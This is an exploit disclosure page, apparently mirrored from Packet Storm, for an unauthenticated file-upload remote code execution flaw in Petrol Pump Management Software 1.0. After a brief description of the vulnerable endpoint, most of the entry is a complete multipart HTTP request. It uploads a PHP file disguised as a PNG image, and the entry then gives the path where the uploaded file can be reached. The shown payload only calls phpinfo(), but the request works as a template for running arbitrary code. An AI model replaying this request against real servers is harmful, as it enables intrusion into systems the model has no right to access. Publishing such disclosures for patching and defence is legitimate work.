Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSoSPiroPACKETSTORM:177210
HistoryFeb 20, 2024 - 12:00 a.m.

Petrol Pump Management Software 1.0 Shell Upload

2024-02-2000:00:00
SoSPiro
packetstormsecurity.com
102
shell upload
remote code execution
windows 10
wampserver
unauthenticated
vulnerability
petrol pump management software
sourcecodester.

7.4 High

AI Score

Confidence

Low

JSON
`# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)  
# Google Dork: N/A  
# Application: Petrol pump management software  
# Date: 20.02.2024  
# Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A  
  
## Vulnerability Description:  
  
Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload   
files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder.   
This allows malicious individuals to execute unauthorized commands on the system.  
  
  
## Staus: HIGH-CRITICAL Vulnerability  
  
  
## Proof of Concept (PoC):  
  
Video:  
https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view  
  
  
  
// File upload Request  
  
  
POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/zer/fuelflow/admin/web.php  
Cookie: PHPSESSID=1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="id"  
  
1  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photo1_img"  
  
test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photo1"; filename="3.php"  
Content-Type: image/png  
  
<?php phpinfo();?>  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="title"  
  
FuelFlow lite - Developed by Mayuri K. tessss  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photos_img"  
  
test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photos"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="sitekey"  
  
test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="secretkey"  
  
test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="update"  
  
  
-----------------------------82750242321210078514140255085--  
  
  
  
  
  
  
// Phpinfo file locaton   
  
/zerday/fuelflow/assets/images/65d45a6080eca.php  
`

7.4 High

AI Score

Confidence

Low

JSON